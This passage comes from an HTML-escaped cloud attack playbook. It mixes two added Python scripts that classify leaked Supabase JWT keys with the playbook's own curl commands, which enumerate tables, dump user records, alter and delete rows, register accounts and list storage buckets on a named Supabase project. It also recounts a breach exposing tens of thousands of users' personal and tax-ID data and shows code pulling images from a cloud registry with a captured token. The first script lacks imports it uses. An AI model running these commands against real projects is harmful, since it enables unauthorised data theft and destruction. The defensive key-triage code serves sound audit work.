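import hmac
import json


def b64url_decode(segment):
    """Decode a base64url JWT segment that has had its padding stripped."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt(token):
    """Split a JWT into (header, claims) WITHOUT verifying the signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT")
    return json.loads(b64url_decode(parts[0])), json.loads(b64url_decode(parts[1]))


def classify_supabase_key(token, expected_ref=None):
    """Triage a Supabase key found in a client bundle; returns role plus a defender severity."""
    header, claims = decode_jwt(token)
    role = claims.get("role")
    ref = claims.get("ref")
    result = {"alg": header.get("alg"), "iss": claims.get("iss"), "ref": ref, "role": role}
    if claims.get("iss") != "supabase":
        result["severity"] = "NOT_SUPABASE"
    elif role == "service_role":
        result["severity"] = "CRITICAL"   # bypasses RLS; must never ship to a client
    elif role == "anon":
        result["severity"] = "EXPECTED"   # public by design; safety depends on RLS per table
    else:
        result["severity"] = "REVIEW"
    if expected_ref is not None and ref != expected_ref:
        result["ref_mismatch"] = True     # key belongs to a different project than the URL
    return result


def verify_hs256(token, secret):
    """Check the HS256 signature with the project JWT secret (server side only)."""
    header, body, signature = token.split(".")
    mac = hmac.new(secret.encode(), (header + "." + body).encode(), hashlib.sha256).digest()
    return hmac.compare_digest(b64url_encode(mac), signature)


def make_token(claims, secret):
    """Mint an HS256 JWT; used here only to build the constructed sample keys offline."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(secret.encode(), (header + "." + body).encode(), hashlib.sha256).digest()
    return header + "." + body + "." + b64url_encode(mac)


# Constructed sample project: a fake ref and a fake JWT secret, never a real project's.
SAMPLE_REF = "abcdefghijklmnopqrst"
SAMPLE_SECRET = "constructed-sample-jwt-secret-not-real"
SAMPLE_ANON_KEY = make_token(
    {"iss": "supabase", "ref": SAMPLE_REF, "role": "anon", "iat": 1700000000, "exp": 2000000000}, SAMPLE_SECRET)
SAMPLE_SERVICE_KEY = make_token(
    {"iss": "supabase", "ref": SAMPLE_REF, "role": "service_role", "iat": 1700000000, "exp": 2000000000}, SAMPLE_SECRET)

if __name__ == "__main__":
    print(classify_supabase_key(SAMPLE_ANON_KEY, SAMPLE_REF))
    print(classify_supabase_key(SAMPLE_SERVICE_KEY, SAMPLE_REF))
    print(verify_hs256(SAMPLE_ANON_KEY, SAMPLE_SECRET))
```

&lt;p&gt;The header of both sample tokens is the same &lt;code&gt;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9&lt;/code&gt; prefix seen in the enumeration script below, because it is just the compact base64url of the HS256 JWT header. An anon key in a bundle is normal; a service_role key in a bundle means every table is readable and writable regardless of RLS, and the only fix is rotating the project JWT secret.&lt;/p&gt;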
&lt;h3 id="113-table-and-data-enumeration" &gt;
&lt;div&gt;
&lt;a href="#113-table-and-data-enumeration"&gt;
##
&lt;/a&gt;
11.3 Table and Data Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;gfgmuezavgzjmaxhflsu&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List ALL tables (if RLS is broken) — test common names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; table in users profiles posts products orders &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clients companies messages conversations &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; relatorios relatorio purchase etapa; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/rest/v1/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;table&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;?limit=1&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | head -c &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Table dump (if accessible)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/rest/v1/users?select=*&amp;amp;limit=100&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test UPDATE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PATCH &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/rest/v1/etapa?id=eq.1&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Prefer: return=minimal&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;status&amp;#34;:&amp;#34;hacked&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test DELETE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X DELETE &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/rest/v1/relatorio?id=eq.1&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SignUp (if open)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/auth/v1/signup&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;email&amp;#34;:&amp;#34;test@test.com&amp;#34;,&amp;#34;password&amp;#34;:&amp;#34;Test123!&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Storage — list buckets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/storage/v1/bucket&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: Traffic management platform — Supabase with RLS turned off. Anon key exposed in the JS bundle.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;64,105 users&lt;/strong&gt;: id, name, email, phone, company, role&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;46,717 reports&lt;/strong&gt;: url_pdf (public), radar data&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;676 purchases&lt;/strong&gt;: CPF (Brazilian taxpayer ID, the equivalent of an SSN), address, phone, product, amount&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;232,000+ questionnaire responses&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;UPDATE and DELETE&lt;/strong&gt; confirmed (worked with anon key)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Open SignUp&lt;/strong&gt;: anyone could create an account&lt;/li&gt;
&lt;/ul&gt;
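Added here as a defender's check, not the playbook's own code: a Python script that classifies any Supabase key found in a shipped JS bundle by its JWT role claim, so a team can tell the expected anon key (public by design; RLS on each table is the real control) from a leaked service_role key that bypasses RLS. The bundle fragment and the tokens in it are constructed.

```python
"""Classify Supabase keys shipped in a JS bundle by the JWT role claim.

Added example, not from the playbook. Supabase API keys are JWTs whose payload
carries a "role" claim. An "anon" key is meant to be public: every request made
with it is subject to Row Level Security, so the real control is RLS on each
table. A "service_role" key bypasses RLS entirely and must never reach a client.
The signature is not verified here (the signing secret stays on the server);
for triage only the claims matter.
"""
import base64
import json
import operator
import re
import time

# Shape of a JWT inside minified JS; "eyJ" is base64 for a payload starting with '{"'
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")


def _b64url_decode(segment):
    # JWT segments omit base64 padding; restore it before decoding
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def jwt_claims(token):
    """Return the payload claims of a JWT without verifying its signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT")
    return json.loads(_b64url_decode(parts[1]))


def classify_supabase_key(token, now=None):
    """Describe the key's role and whether it belongs in client-side code."""
    claims = jwt_claims(token)
    role = claims.get("role")
    exp = claims.get("exp")
    now = time.time() if now is None else now
    expired = exp is not None and operator.lt(exp, now)
    if role == "service_role":
        verdict = "CRITICAL: service_role bypasses RLS; rotate the key and remove it from client code"
    elif role == "anon":
        verdict = "expected: anon key is public by design; exposure is decided by RLS on each table"
    else:
        verdict = f"unknown role {role!r}; check the project's JWT settings"
    return {"role": role, "project_ref": claims.get("ref"), "expired": expired, "verdict": verdict}


def audit_bundle(js_source, now=None):
    """Find every JWT-shaped token in a bundle and classify the ones that decode."""
    results = []
    for match in JWT_RE.finditer(js_source):
        try:
            results.append(classify_supabase_key(match.group(0), now))
        except (ValueError, json.JSONDecodeError, UnicodeDecodeError):
            continue  # base64 noise that merely looked like a JWT
    return results


def make_unsigned_jwt(claims):
    """Constructed test token: real header and payload, placeholder signature."""
    header = base64.urlsafe_b64encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode()).rstrip(b"=").decode()
    payload = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=").decode()
    return f"{header}.{payload}.placeholdersig"


# Constructed bundle fragment: ships the anon key and, by mistake, the service key too
SAMPLE_BUNDLE = (
    'const supabase=createClient("https://example-ref.supabase.co","'
    + make_unsigned_jwt({"iss": "supabase", "ref": "example-ref", "role": "anon", "exp": 2000000000})
    + '");const admin=createClient(url,"'
    + make_unsigned_jwt({"iss": "supabase", "ref": "example-ref", "role": "service_role", "exp": 2000000000})
    + '");'
)

if __name__ == "__main__":
    for finding in audit_bundle(SAMPLE_BUNDLE):
        print(finding)
```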
&lt;hr&gt;
&lt;h2 id="12-cloud-run-containers--artifact-registry" &gt;
&lt;div&gt;
&lt;a href="#12-cloud-run-containers--artifact-registry"&gt;
#
&lt;/a&gt;
12. CLOUD RUN, CONTAINERS &amp;amp; ARTIFACT REGISTRY
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="121-list-cloud-run-services" &gt;
&lt;div&gt;
&lt;a href="#121-list-cloud-run-services"&gt;
##
&lt;/a&gt;
12.1 List Cloud Run Services
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; {v2} &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; require(&lt;span style="color:#a6d189"&gt;&amp;#39;@google-cloud/run&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; client &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;new&lt;/span&gt; v2.ServicesClient({credentials&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; sa});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; [services] &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;await&lt;/span&gt; client.listServices({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; parent&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;projects/&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; projectId &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;/locations/us-central1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; (&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; svc &lt;span style="color:#ca9ee6"&gt;of&lt;/span&gt; services) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; console.log(svc.name, svc.uri, svc.ingress);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;// ingress: &amp;#34;all&amp;#34; = public, &amp;#34;internal&amp;#34; = VPC only
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="122-artifact-registry--download-and-analyze-images" &gt;
&lt;div&gt;
&lt;a href="#122-artifact-registry--download-and-analyze-images"&gt;
##
&lt;/a&gt;
12.2 Artifact Registry — Download and Analyze Images
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List repositories&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://artifactregistry.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/locations/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;region&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/repositories&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Download specific image manifest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;digest &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;sha256:XXXXX&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;region&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-docker.pkg.dev/v2/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;repo&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;image&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/manifests/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;digest&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;Accept&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;application/vnd.docker.distribution.manifest.v2+json&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Download layers&lt;/span&gt;
